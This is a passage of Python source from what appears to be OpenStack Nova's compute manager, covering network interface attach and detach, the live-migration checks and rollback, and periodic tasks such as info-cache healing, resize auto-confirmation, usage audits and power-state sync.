# NOTE(PhilDay): Can't use object_compat decorator here as
# instance is not the second parameter
if isinstance(instance, dict):
metas = ['metadata', 'system_metadata']
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance,
expected_attrs=metas)
instance._context = context
try:
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id)
self._driver_detach_volume(context, instance, bdm)
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context, volume_id, connector)
except exception.NotFound:
pass
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def attach_interface(self, context, instance, network_id, port_id,
requested_ip):
"""Use hotplug to add an network adapter to an instance."""
network_info = self.network_api.allocate_port_for_instance(
context, instance, port_id, network_id, requested_ip)
if len(network_info) != 1:
LOG.error(_LE('allocate_port_for_instance returned %(ports)s '
'ports'), dict(ports=len(network_info)))
raise exception.InterfaceAttachFailed(
instance_uuid=instance.uuid)
image_ref = instance.get('image_ref')
image_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
try:
self.driver.attach_interface(instance, image_meta, network_info[0])
except exception.NovaException as ex:
port_id = network_info[0].get('id')
LOG.warn(_LW("attach interface failed , try to deallocate "
"port %(port_id)s, reason: %(msg)s"),
{'port_id': port_id, 'msg': ex},
instance=instance)
try:
self.network_api.deallocate_port_for_instance(
context, instance, port_id)
except Exception:
LOG.warn(_LW("deallocate port %(port_id)s failed"),
{'port_id': port_id}, instance=instance)
raise exception.InterfaceAttachFailed(
instance_uuid=instance.uuid)
return network_info[0]
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def detach_interface(self, context, instance, port_id):
"""Detach an network adapter from an instance."""
network_info = instance.info_cache.network_info
condemned = None
for vif in network_info:
if vif['id'] == port_id:
condemned = vif
break
if condemned is None:
raise exception.PortNotFound(_("Port %s is not "
"attached") % port_id)
try:
self.driver.detach_interface(instance, condemned)
except exception.NovaException as ex:
LOG.warning(_LW("Detach interface failed, port_id=%(port_id)s,"
" reason: %(msg)s"),
{'port_id': port_id, 'msg': ex}, instance=instance)
raise exception.InterfaceDetachFailed(instance_uuid=instance.uuid)
else:
try:
self.network_api.deallocate_port_for_instance(
context, instance, port_id)
except Exception as ex:
with excutils.save_and_reraise_exception():
# Since this is a cast operation, log the failure for
# triage.
LOG.warning(_LW('Failed to deallocate port %(port_id)s '
'for instance. Error: %(error)s'),
{'port_id': port_id, 'error': ex},
instance=instance)
def _get_compute_info(self, context, host):
return objects.ComputeNode.get_first_node_by_host_for_old_compat(
context, host)
@wrap_exception()
def check_instance_shared_storage(self, ctxt, instance, data):
"""Check if the instance files are shared
:param ctxt: security context
:param instance: dict of instance data
:param data: result of driver.check_instance_shared_storage_local
        Returns True if the instance disks are located on shared storage and
        False otherwise.
"""
return self.driver.check_instance_shared_storage_remote(ctxt, data)
@wrap_exception()
@wrap_instance_fault
def check_can_live_migrate_destination(self, ctxt, instance,
block_migration, disk_over_commit):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: dict of instance data
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
:returns: a dict containing migration info
"""
src_compute_info = obj_base.obj_to_primitive(
self._get_compute_info(ctxt, instance.host))
dst_compute_info = obj_base.obj_to_primitive(
self._get_compute_info(ctxt, CONF.host))
dest_check_data = self.driver.check_can_live_migrate_destination(ctxt,
instance, src_compute_info, dst_compute_info,
block_migration, disk_over_commit)
migrate_data = {}
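        # Forward the destination's check data to the source host so it can
        # run its own checks; the finally block always cleans up anything
        # the destination check created.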
try:
migrate_data = self.compute_rpcapi.\
check_can_live_migrate_source(ctxt, instance,
dest_check_data)
finally:
self.driver.check_can_live_migrate_destination_cleanup(ctxt,
dest_check_data)
if 'migrate_data' in dest_check_data:
migrate_data.update(dest_check_data['migrate_data'])
return migrate_data
@wrap_exception()
@wrap_instance_fault
def check_can_live_migrate_source(self, ctxt, instance, dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param ctxt: security context
:param instance: dict of instance data
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
is_volume_backed = self.compute_api.is_volume_backed_instance(ctxt,
instance)
dest_check_data['is_volume_backed'] = is_volume_backed
block_device_info = self._get_instance_block_device_info(
ctxt, instance, refresh_conn_info=True)
return self.driver.check_can_live_migrate_source(ctxt, instance,
dest_check_data,
block_device_info)
@object_compat
@wrap_exception()
@wrap_instance_fault
def pre_live_migration(self, context, instance, block_migration, disk,
migrate_data):
"""Preparations for live migration at dest host.
:param context: security context
:param instance: dict of instance data
:param block_migration: if true, prepare for block migration
:param migrate_data: if not None, it is a dict which holds data
required for live migration without shared
storage.
"""
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.pre.start",
network_info=network_info)
pre_live_migration_data = self.driver.pre_live_migration(context,
instance,
block_device_info,
network_info,
disk,
migrate_data)
# NOTE(tr3buchet): setup networks on destination host
self.network_api.setup_networks_on_host(context, instance,
self.host)
        # Create filters for the hypervisor and firewall.
        # An example is nova-instance-instance-xxx, which is written to
        # libvirt.xml (check "virsh nwfilter-list"). This nwfilter is
        # necessary on the destination host. In addition, this method
        # creates the filtering rule on the destination host.
self.driver.ensure_filtering_rules_for_instance(instance,
network_info)
self._notify_about_instance_usage(
context, instance, "live_migration.pre.end",
network_info=network_info)
return pre_live_migration_data
@wrap_exception()
@wrap_instance_fault
def live_migration(self, context, dest, instance, block_migration,
migrate_data):
"""Executing live migration.
:param context: security context
:param instance: a nova.objects.instance.Instance object
:param dest: destination host
:param block_migration: if true, prepare for block migration
:param migrate_data: implementation specific params
"""
# NOTE(danms): since instance is not the first parameter, we can't
# use @object_compat on this method. Since this is the only example,
# we do this manually instead of complicating the decorator
if not isinstance(instance, obj_base.NovaObject):
expected = ['metadata', 'system_metadata',
'security_groups', 'info_cache']
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance,
expected_attrs=expected)
# Create a local copy since we'll be modifying the dictionary
migrate_data = dict(migrate_data or {})
try:
if block_migration:
block_device_info = self._get_instance_block_device_info(
context, instance)
disk = self.driver.get_instance_disk_info(
instance, block_device_info=block_device_info)
else:
disk = None
pre_migration_data = self.compute_rpcapi.pre_live_migration(
context, instance,
block_migration, disk, dest, migrate_data)
migrate_data['pre_live_migration_result'] = pre_migration_data
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Pre live migration failed at %s'),
dest, instance=instance)
self._rollback_live_migration(context, instance, dest,
block_migration, migrate_data)
# Executing live migration
        # live_migration might raise exceptions, but
# nothing must be recovered in this version.
self.driver.live_migration(context, instance, dest,
self._post_live_migration,
self._rollback_live_migration,
block_migration, migrate_data)
def _live_migration_cleanup_flags(self, block_migration, migrate_data):
"""Determine whether disks or instance path need to be cleaned up after
live migration (at source on success, at destination on rollback)
Block migration needs empty image at destination host before migration
        starts, so if any failure occurs, any empty images have to be deleted.
Also Volume backed live migration w/o shared storage needs to delete
newly created instance-xxx dir on the destination as a part of its
rollback process
:param block_migration: if true, it was a block migration
:param migrate_data: implementation specific data
:returns: (bool, bool) -- do_cleanup, destroy_disks
"""
# NOTE(angdraug): block migration wouldn't have been allowed if either
# block storage or instance path were shared
is_shared_block_storage = not block_migration
is_shared_instance_path = not block_migration
if migrate_data:
is_shared_block_storage = migrate_data.get(
'is_shared_block_storage', is_shared_block_storage)
is_shared_instance_path = migrate_data.get(
'is_shared_instance_path', is_shared_instance_path)
        # No instance booting at source host, but instance dir
        # must be deleted for preparing next block migration
        # or next live migration w/o shared storage
do_cleanup = block_migration or not is_shared_instance_path
destroy_disks = not is_shared_block_storage
return (do_cleanup, destroy_disks)
@wrap_exception()
@wrap_instance_fault
def _post_live_migration(self, ctxt, instance,
dest, block_migration=False, migrate_data=None):
"""Post operations for live migration.
This method is called from live_migration
and mainly updating database record.
:param ctxt: security context
:param instance: instance dict
:param dest: destination host
:param block_migration: if true, prepare for block migration
:param migrate_data: if not None, it is a dict which has data
required for live migration without shared storage
"""
        LOG.info(_LI('_post_live_migration() is started...'),
instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, instance.uuid)
# Cleanup source host post live-migration
block_device_info = self._get_instance_block_device_info(
ctxt, instance, bdms=bdms)
self.driver.post_live_migration(ctxt, instance, block_device_info,
migrate_data)
# Detaching volumes.
connector = self.driver.get_volume_connector(instance)
for bdm in bdms:
# NOTE(vish): We don't want to actually mark the volume
# detached, or delete the bdm, just remove the
# connection from this host.
# remove the volume connection without detaching from hypervisor
# because the instance is not running anymore on the current host
if bdm.is_volume:
self.volume_api.terminate_connection(ctxt, bdm.volume_id,
connector)
# Releasing vlan.
# (not necessary in current implementation?)
network_info = self._get_instance_nw_info(ctxt, instance)
self._notify_about_instance_usage(ctxt, instance,
"live_migration._post.start",
network_info=network_info)
# Releasing security group ingress rule.
self.driver.unfilter_instance(instance,
network_info)
migration = {'source_compute': self.host,
'dest_compute': dest, }
self.network_api.migrate_instance_start(ctxt,
instance,
migration)
destroy_vifs = False
try:
self.driver.post_live_migration_at_source(ctxt, instance,
network_info)
except NotImplementedError as ex:
LOG.debug(ex, instance=instance)
# For all hypervisors other than libvirt, there is a possibility
# they are unplugging networks from source node in the cleanup
# method
destroy_vifs = True
# Define domain at destination host, without doing it,
# pause/suspend/terminate do not work.
self.compute_rpcapi.post_live_migration_at_destination(ctxt,
instance, block_migration, dest)
do_cleanup, destroy_disks = self._live_migration_cleanup_flags(
block_migration, migrate_data)
if do_cleanup:
self.driver.cleanup(ctxt, instance, network_info,
destroy_disks=destroy_disks,
migrate_data=migrate_data,
destroy_vifs=destroy_vifs)
self.instance_events.clear_events_for_instance(instance)
# NOTE(timello): make sure we update available resources on source
# host even before next periodic task.
self.update_available_resource(ctxt)
self._update_scheduler_instance_info(ctxt, instance)
self._notify_about_instance_usage(ctxt, instance,
"live_migration._post.end",
network_info=network_info)
LOG.info(_LI('Migrating instance to %s finished successfully.'),
dest, instance=instance)
LOG.info(_LI("You may see the error \"libvirt: QEMU error: "
"Domain not found: no domain with matching name.\" "
"This error can be safely ignored."),
instance=instance)
if CONF.vnc_enabled or CONF.spice.enabled or CONF.rdp.enabled:
if CONF.cells.enable:
self.cells_rpcapi.consoleauth_delete_tokens(ctxt,
instance.uuid)
else:
self.consoleauth_rpcapi.delete_tokens_for_instance(ctxt,
instance.uuid)
@object_compat
@wrap_exception()
@wrap_instance_fault
def post_live_migration_at_destination(self, context, instance,
block_migration):
"""Post operations for live migration .
:param context: security context
:param instance: Instance dict
:param block_migration: if true, prepare for block migration
"""
LOG.info(_LI('Post operation of migration started'),
instance=instance)
# NOTE(tr3buchet): setup networks on destination host
# this is called a second time because
# multi_host does not create the bridge in
# plug_vifs
self.network_api.setup_networks_on_host(context, instance,
self.host)
migration = {'source_compute': instance.host,
'dest_compute': self.host, }
self.network_api.migrate_instance_finish(context,
instance,
migration)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.post.dest.start",
network_info=network_info)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.post_live_migration_at_destination(context, instance,
network_info,
block_migration, block_device_info)
# Restore instance state
current_power_state = self._get_power_state(context, instance)
node_name = None
prev_host = instance.host
try:
compute_node = self._get_compute_info(context, self.host)
node_name = compute_node.hypervisor_hostname
except exception.ComputeHostNotFound:
LOG.exception(_LE('Failed to get compute_info for %s'), self.host)
finally:
instance.host = self.host
instance.power_state = current_power_state
instance.task_state = None
instance.node = node_name
instance.save(expected_task_state=task_states.MIGRATING)
# NOTE(tr3buchet): tear down networks on source host
self.network_api.setup_networks_on_host(context, instance,
prev_host, teardown=True)
# NOTE(vish): this is necessary to update dhcp
self.network_api.setup_networks_on_host(context, instance, self.host)
self._notify_about_instance_usage(
context, instance, "live_migration.post.dest.end",
network_info=network_info)
@wrap_exception()
@wrap_instance_fault
def _rollback_live_migration(self, context, instance,
dest, block_migration, migrate_data=None):
"""Recovers Instance/volume state from migrating -> running.
:param context: security context
:param instance: nova.objects.instance.Instance object
:param dest:
This method is called from live migration src host.
This param specifies destination host.
:param block_migration: if true, prepare for block migration
:param migrate_data:
if not none, contains implementation specific data.
"""
instance.task_state = None
instance.save(expected_task_state=[task_states.MIGRATING])
# NOTE(tr3buchet): setup networks on source host (really it's re-setup)
self.network_api.setup_networks_on_host(context, instance, self.host)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
for bdm in bdms:
if bdm.is_volume:
self.compute_rpcapi.remove_volume_connection(
context, instance, bdm.volume_id, dest)
self._notify_about_instance_usage(context, instance,
"live_migration._rollback.start")
do_cleanup, destroy_disks = self._live_migration_cleanup_flags(
block_migration, migrate_data)
if do_cleanup:
self.compute_rpcapi.rollback_live_migration_at_destination(
context, instance, dest, destroy_disks=destroy_disks,
migrate_data=migrate_data)
self._notify_about_instance_usage(context, instance,
"live_migration._rollback.end")
@object_compat
@wrap_exception()
@wrap_instance_fault
def rollback_live_migration_at_destination(self, context, instance,
destroy_disks=True,
migrate_data=None):
"""Cleaning up image directory that is created pre_live_migration.
:param context: security context
:param instance: a nova.objects.instance.Instance object sent over rpc
"""
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.rollback.dest.start",
network_info=network_info)
# NOTE(tr3buchet): tear down networks on destination host
self.network_api.setup_networks_on_host(context, instance,
self.host, teardown=True)
# NOTE(vish): The mapping is passed in so the driver can disconnect
# from remote volumes if necessary
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.rollback_live_migration_at_destination(
context, instance, network_info, block_device_info,
destroy_disks=destroy_disks, migrate_data=migrate_data)
self._notify_about_instance_usage(
context, instance, "live_migration.rollback.dest.end",
network_info=network_info)
@periodic_task.periodic_task(
spacing=CONF.heal_instance_info_cache_interval)
def _heal_instance_info_cache(self, context):
"""Called periodically. On every call, try to update the
info_cache's network information for another instance by
calling to the network manager.
This is implemented by keeping a cache of uuids of instances
that live on this host. On each call, we pop one off of a
list, pull the DB record, and try the call to the network API.
        If anything errors, don't fail, as it's possible the instance
has been deleted, etc.
"""
heal_interval = CONF.heal_instance_info_cache_interval
if not heal_interval:
return
instance_uuids = getattr(self, '_instance_uuids_to_heal', [])
instance = None
LOG.debug('Starting heal instance info cache')
if not instance_uuids:
# The list of instances to heal is empty so rebuild it
LOG.debug('Rebuilding the list of instances to heal')
db_instances = objects.InstanceList.get_by_host(
context, self.host, expected_attrs=[], use_slave=True)
for inst in db_instances:
# We don't want to refresh the cache for instances
# which are building or deleting so don't put them
# in the list. If they are building they will get
# added to the list next time we build it.
if (inst.vm_state == vm_states.BUILDING):
LOG.debug('Skipping network cache update for instance '
'because it is Building.', instance=inst)
continue
if (inst.task_state == task_states.DELETING):
LOG.debug('Skipping network cache update for instance '
'because it is being deleted.', instance=inst)
continue
if not instance:
# Save the first one we find so we don't
# have to get it again
instance = inst
else:
instance_uuids.append(inst['uuid'])
self._instance_uuids_to_heal = instance_uuids
else:
# Find the next valid instance on the list
while instance_uuids:
try:
inst = objects.Instance.get_by_uuid(
context, instance_uuids.pop(0),
expected_attrs=['system_metadata', 'info_cache'],
use_slave=True)
except exception.InstanceNotFound:
# Instance is gone. Try to grab another.
continue
# Check the instance hasn't been migrated
if inst.host != self.host:
LOG.debug('Skipping network cache update for instance '
'because it has been migrated to another '
'host.', instance=inst)
                # Check the instance isn't being deleted
elif inst.task_state == task_states.DELETING:
LOG.debug('Skipping network cache update for instance '
'because it is being deleted.', instance=inst)
else:
instance = inst
break
if instance:
# We have an instance now to refresh
try:
# Call to network API to get instance info.. this will
# force an update to the instance's info_cache
self._get_instance_nw_info(context, instance)
LOG.debug('Updated the network info_cache for instance',
instance=instance)
except exception.InstanceNotFound:
# Instance is gone.
LOG.debug('Instance no longer exists. Unable to refresh',
instance=instance)
return
except Exception:
LOG.error(_LE('An error occurred while refreshing the network '
'cache.'), instance=instance, exc_info=True)
else:
LOG.debug("Didn't find any instances for network info cache "
"update.")
@periodic_task.periodic_task
def _poll_rebooting_instances(self, context):
if CONF.reboot_timeout > 0:
filters = {'task_state':
[task_states.REBOOTING,
task_states.REBOOT_STARTED,
task_states.REBOOT_PENDING],
'host': self.host}
rebooting = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=[], use_slave=True)
to_poll = []
for instance in rebooting:
if timeutils.is_older_than(instance.updated_at,
CONF.reboot_timeout):
to_poll.append(instance)
self.driver.poll_rebooting_instances(CONF.reboot_timeout, to_poll)
@periodic_task.periodic_task
def _poll_rescued_instances(self, context):
if CONF.rescue_timeout > 0:
filters = {'vm_state': vm_states.RESCUED,
'host': self.host}
rescued_instances = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=["system_metadata"],
use_slave=True)
to_unrescue = []
for instance in rescued_instances:
if timeutils.is_older_than(instance.launched_at,
CONF.rescue_timeout):
to_unrescue.append(instance)
for instance in to_unrescue:
self.compute_api.unrescue(context, instance)
@periodic_task.periodic_task
def _poll_unconfirmed_resizes(self, context):
if CONF.resize_confirm_window == 0:
return
migrations = objects.MigrationList.get_unconfirmed_by_dest_compute(
context, CONF.resize_confirm_window, self.host,
use_slave=True)
migrations_info = dict(migration_count=len(migrations),
confirm_window=CONF.resize_confirm_window)
if migrations_info["migration_count"] > 0:
LOG.info(_LI("Found %(migration_count)d unconfirmed migrations "
"older than %(confirm_window)d seconds"),
migrations_info)
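        # Local helper to flag a migration record as errored with a logged
        # reason.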
def _set_migration_to_error(migration, reason, **kwargs):
LOG.warning(_LW("Setting migration %(migration_id)s to error: "
"%(reason)s"),
{'migration_id': migration['id'], 'reason': reason},
**kwargs)
migration.status = 'error'
with migration.obj_as_admin():
migration.save()
for migration in migrations:
instance_uuid = migration.instance_uuid
LOG.info(_LI("Automatically confirming migration "
"%(migration_id)s for instance %(instance_uuid)s"),
{'migration_id': migration.id,
'instance_uuid': instance_uuid})
expected_attrs = ['metadata', 'system_metadata']
try:
instance = objects.Instance.get_by_uuid(context,
instance_uuid, expected_attrs=expected_attrs,
use_slave=True)
except exception.InstanceNotFound:
reason = (_("Instance %s not found") %
instance_uuid)
_set_migration_to_error(migration, reason)
continue
if instance.vm_state == vm_states.ERROR:
reason = _("In ERROR state")
_set_migration_to_error(migration, reason,
instance=instance)
continue
            # race condition: An instance in DELETING state should not have
            # its migration set to error, otherwise an instance in RESIZED
            # state that is about to be deleted will not be able to confirm
            # the resize
if instance.task_state in [task_states.DELETING,
task_states.SOFT_DELETING]:
msg = ("Instance being deleted or soft deleted during resize "
"confirmation. Skipping.")
LOG.debug(msg, instance=instance)
continue
# race condition: This condition is hit when this method is
# called between the save of the migration record with a status of
# finished and the save of the instance object with a state of
# RESIZED. The migration record should not be set to error.
if instance.task_state == task_states.RESIZE_FINISH:
msg = ("Instance still resizing during resize "
"confirmation. Skipping.")
LOG.debug(msg, instance=instance)
continue
vm_state = instance.vm_state
task_state = instance.task_state
if vm_state != vm_states.RESIZED or task_state is not None:
reason = (_("In states %(vm_state)s/%(task_state)s, not "
"RESIZED/None") %
{'vm_state': vm_state,
'task_state': task_state})
_set_migration_to_error(migration, reason,
instance=instance)
continue
try:
self.compute_api.confirm_resize(context, instance,
migration=migration)
except Exception as e:
LOG.info(_LI("Error auto-confirming resize: %s. "
"Will retry later."),
e, instance=instance)
@periodic_task.periodic_task(spacing=CONF.shelved_poll_interval)
def _poll_shelved_instances(self, context):
if CONF.shelved_offload_time <= 0:
return
filters = {'vm_state': vm_states.SHELVED,
'host': self.host}
shelved_instances = objects.InstanceList.get_by_filters(
context, filters=filters, expected_attrs=['system_metadata'],
use_slave=True)
to_gc = []
for instance in shelved_instances:
sys_meta = instance.system_metadata
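            # 'shelved_at' is stamped into system_metadata when the instance
            # is shelved; anything shelved longer than shelved_offload_time
            # is queued for offload below.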
shelved_at = timeutils.parse_strtime(sys_meta['shelved_at'])
if timeutils.is_older_than(shelved_at, CONF.shelved_offload_time):
to_gc.append(instance)
for instance in to_gc:
try:
instance.task_state = task_states.SHELVING_OFFLOADING
instance.save()
self.shelve_offload_instance(context, instance,
clean_shutdown=False)
except Exception:
LOG.exception(_LE('Periodic task failed to offload instance.'),
instance=instance)
@periodic_task.periodic_task
def _instance_usage_audit(self, context):
if not CONF.instance_usage_audit:
return
if compute_utils.has_audit_been_run(context,
self.conductor_api,
self.host):
return
begin, end = utils.last_completed_audit_period()
instances = objects.InstanceList.get_active_by_window_joined(
context, begin, end, host=self.host,
expected_attrs=['system_metadata', 'info_cache', 'metadata'],
use_slave=True)
num_instances = len(instances)
errors = 0
successes = 0
LOG.info(_LI("Running instance usage audit for"
" host %(host)s from %(begin_time)s to "
"%(end_time)s. %(number_instances)s"
" instances."),
dict(host=self.host,
begin_time=begin,
end_time=end,
number_instances=num_instances))
start_time = time.time()
compute_utils.start_instance_usage_audit(context,
self.conductor_api,
begin, end,
self.host, num_instances)
for instance in instances:
try:
compute_utils.notify_usage_exists(
self.notifier, context, instance,
ignore_missing_network_data=False)
successes += 1
except Exception:
LOG.exception(_LE('Failed to generate usage '
'audit for instance '
'on host %s'), self.host,
instance=instance)
errors += 1
compute_utils.finish_instance_usage_audit(context,
self.conductor_api,
begin, end,
self.host, errors,
"Instance usage audit ran "
"for host %s, %s instances "
"in %s seconds." % (
self.host,
num_instances,
time.time() - start_time))
@periodic_task.periodic_task(spacing=CONF.bandwidth_poll_interval)
def _poll_bandwidth_usage(self, context):
if not self._bw_usage_supported:
return
prev_time, start_time = utils.last_completed_audit_period()
curr_time = time.time()
if (curr_time - self._last_bw_usage_poll >
CONF.bandwidth_poll_interval):
self._last_bw_usage_poll = curr_time
LOG.info(_LI("Updating bandwidth usage cache"))
cells_update_interval = CONF.cells.bandwidth_update_interval
if (cells_update_interval > 0 and
curr_time - self._last_bw_usage_cell_update >
cells_update_interval):
self._last_bw_usage_cell_update = curr_time
update_cells = True
else:
update_cells = False
instances = objects.InstanceList.get_by_host(context,
self.host,
use_slave=True)
try:
bw_counters = self.driver.get_all_bw_counters(instances)
except NotImplementedError:
# NOTE(mdragon): Not all hypervisors have bandwidth polling
# implemented yet. If they don't it doesn't break anything,
# they just don't get the info in the usage events.
# NOTE(PhilDay): Record that its not supported so we can
# skip fast on future calls rather than waste effort getting
# the list of instances.
LOG.warning(_LW("Bandwidth usage not supported by "
"hypervisor."))
self._bw_usage_supported = False
return
refreshed = timeutils.utcnow()
for bw_ctr in bw_counters:
# Allow switching of greenthreads between queries.
greenthread.sleep(0)
bw_in = 0
bw_out = 0
last_ctr_in = None
last_ctr_out = None
usage = objects.BandwidthUsage.get_by_instance_uuid_and_mac(
context, bw_ctr['uuid'], bw_ctr['mac_address'],
start_period=start_time, use_slave=True)
if usage:
bw_in = usage.bw_in
bw_out = usage.bw_out
last_ctr_in = usage.last_ctr_in
last_ctr_out = usage.last_ctr_out
else:
usage = (objects.BandwidthUsage.
get_by_instance_uuid_and_mac(
context, bw_ctr['uuid'], bw_ctr['mac_address'],
start_period=prev_time, use_slave=True))
if usage:
last_ctr_in = usage.last_ctr_in
last_ctr_out = usage.last_ctr_out
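                # Compute deltas against the last sampled counters; if the
                # current counter is lower than the previous sample, the
                # hypervisor counter wrapped (or was reset), so fall back to
                # adding the raw counter value.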
if last_ctr_in is not None:
if bw_ctr['bw_in'] < last_ctr_in:
# counter rollover
bw_in += bw_ctr['bw_in']
else:
bw_in += (bw_ctr['bw_in'] - last_ctr_in)
if last_ctr_out is not None:
if bw_ctr['bw_out'] < last_ctr_out:
# counter rollover
bw_out += bw_ctr['bw_out']
else:
bw_out += (bw_ctr['bw_out'] - last_ctr_out)
objects.BandwidthUsage(context=context).create(
bw_ctr['uuid'],
bw_ctr['mac_address'],
bw_in,
bw_out,
bw_ctr['bw_in'],
bw_ctr['bw_out'],
start_period=start_time,
last_refreshed=refreshed,
update_cells=update_cells)
def _get_host_volume_bdms(self, context, use_slave=False):
"""Return all block device mappings on a compute host."""
compute_host_bdms = []
instances = objects.InstanceList.get_by_host(context, self.host,
use_slave=use_slave)
for instance in instances:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid, use_slave=use_slave)
instance_bdms = [bdm for bdm in bdms if bdm.is_volume]
compute_host_bdms.append(dict(instance=instance,
instance_bdms=instance_bdms))
return compute_host_bdms
def _update_volume_usage_cache(self, context, vol_usages):
"""Updates the volume usage cache table with a list of stats."""
for usage in vol_usages:
# Allow switching of greenthreads between queries.
greenthread.sleep(0)
self.conductor_api.vol_usage_update(context, usage['volume'],
usage['rd_req'],
usage['rd_bytes'],
usage['wr_req'],
usage['wr_bytes'],
usage['instance'])
@periodic_task.periodic_task(spacing=CONF.volume_usage_poll_interval)
def _poll_volume_usage(self, context, start_time=None):
if CONF.volume_usage_poll_interval == 0:
return
if not start_time:
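            # Default to the end of the last completed audit period.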
start_time = utils.last_completed_audit_period()[1]
compute_host_bdms = self._get_host_volume_bdms(context,
use_slave=True)
if not compute_host_bdms:
return
LOG.debug("Updating volume usage cache")
try:
vol_usages = self.driver.get_all_volume_usage(context,
compute_host_bdms)
except NotImplementedError:
return
self._update_volume_usage_cache(context, vol_usages)
@periodic_task.periodic_task(spacing=CONF.sync_power_state_interval,
run_immediately=True)
def _sync_power_states(self, context):
"""Align power states between the database and the hypervisor.
To sync power state data we make a DB call to get the number of
virtual machines known by the hypervisor and if the number matches the
number of virtual machines known by the database, we proceed in a lazy
loop, one database record at a time, checking if the hypervisor has the
same power state as is in the database.
"""
db_instances = objects.InstanceList.get_by_host(context, self.host,
expected_attrs=[],
use_slave=True)
num_vm_instances = self.driver.get_num_instances()
num_db_instances = len(db_instances)
if num_vm_instances != num_db_instances:
LOG.warning(_LW("While synchronizing instance power states, found "
"%(num_db_instances)s instances in the database "
"and %(num_vm_instances)s instances on the "
"hypervisor."),
{'num_db_instances': num_db_instances,
'num_vm_instances': num_vm_instances})
def _sync(db_instance):
# NOTE(melwitt): This must be synchronized as we query state from
# two separate sources, the driver and the database.
# They are set (in stop_instance) and read, in sync.
@utils.synchronized(db_instance.uuid)
def query_driver_power_state_and_sync():
self._query_driver_power_state_and_sync(context, db_instance)
try:
query_driver_power_state_and_sync()
except Exception:
LOG.exception(_LE("Periodic sync_power_state task had an "
"error while processing an instance."),
instance=db_instance)
self._syncs_in_progress.pop(db_instance.uuid)
for db_instance in db_instances:
# process syncs asynchronously - don't want instance locking to
# block entire periodic task thread
uuid = db_instance.uuid
if uuid in self._syncs_in_progress:
                LOG.debug('Sync already in progress for %s', uuid)
            else:
                LOG.debug('Triggering sync for uuid %s', uuid)
self._syncs_in_progress[uuid] = True
self._sync_power_pool.spawn_n(_sync, db_instance)
def _query_driver_power_state_and_sync(self, context, db_instance):
if db_instance.task_state is not None:
LOG.info(_LI("During sync_power_state the instance has a "
"pending task (%(task)s). Skip."),
{'task': db_instance.task_state}, instance=db_instance)
return
# No pending tasks. Now try to figure out the real vm_power_state.
try:
vm_instance = self.driver.get_info(db_instance)
vm_power_state = vm_instance.state
except exception.InstanceNotFound:
vm_power_state = power_state.NOSTATE
# Note(maoy): the above get_info call might take a long time,
# for example, because of a broken libvirt driver.
try:
self._sync_instance_power_state(context,
db_instance,
vm_power_state,
use_slave=True)
except exception.InstanceNotFound:
# NOTE(hanlind): If the instance gets deleted during sync,
# silently ignore.
pass
def _sync_instance_power_state(self, context, db_instance, vm_power_state,
use_slave=False):
"""Align instance power state between the database and hypervisor.
If the instance is not found on the hypervisor, but is in the database,
then a stop() API will be called on the instance.
"""
# We re-query the DB to get the latest instance info to minimize
# (not eliminate) race condition.
db_instance.refresh(use_slave=use_slave)
db_power_state = db_instance.power_state
vm_state = db_instance.vm_state
if self.host != db_instance.host:
# on the sending end of nova-compute _sync_power_state
# may have yielded to the greenthread performing a live
# migration; this in turn has changed the resident-host
# for the VM; However, the instance is still active, it
# is just in the process of migrating to another host.
# This implies that the compute source must relinquish
# control to the compute destination.
LOG.info(_LI("During the sync_power process the "
"instance has moved from "
"host %(src)s to host %(dst)s"),
{'src': db_instance.host,
'dst': self.host},
instance=db_instance)
return
elif db_instance.task_state is not None:
# on the receiving end of nova-compute, it could happen
            # that the DB instance already reports the new resident host
            # but the actual VM has not shown up on the hypervisor
# yet. In this case, let's allow the loop to continue
# and run the state sync in a later round
LOG.info(_LI("During sync_power_state the instance has a "
"pending task (%(task)s). Skip."),
{'task': db_instance.task_state},
instance=db_instance)
return
orig_db_power_state = db_power_state
if vm_power_state != db_power_state:
LOG.info(_LI('During _sync_instance_power_state the DB '
'power_state (%(db_power_state)s) does not match '
'the vm_power_state from the hypervisor '
'(%(vm_power_state)s). Updating power_state in the '
'DB to match the hypervisor.'),
{'db_power_state': db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
# power_state is always updated from hypervisor to db
db_instance.power_state = vm_power_state
db_instance.save()
db_power_state = vm_power_state
# Note(maoy): Now resolve the discrepancy between vm_state and
# vm_power_state. We go through all possible vm_states.
if vm_state in (vm_states.BUILDING,
vm_states.RESCUED,
vm_states.RESIZED,
vm_states.SUSPENDED,
vm_states.ERROR):
# TODO(maoy): we ignore these vm_state for now.
pass
elif vm_state == vm_states.ACTIVE:
# The only rational power state should be RUNNING
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning(_LW("Instance shutdown by itself. Calling the "
"stop API. Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s"),
{'vm_state': vm_state,
'task_state': db_instance.task_state,
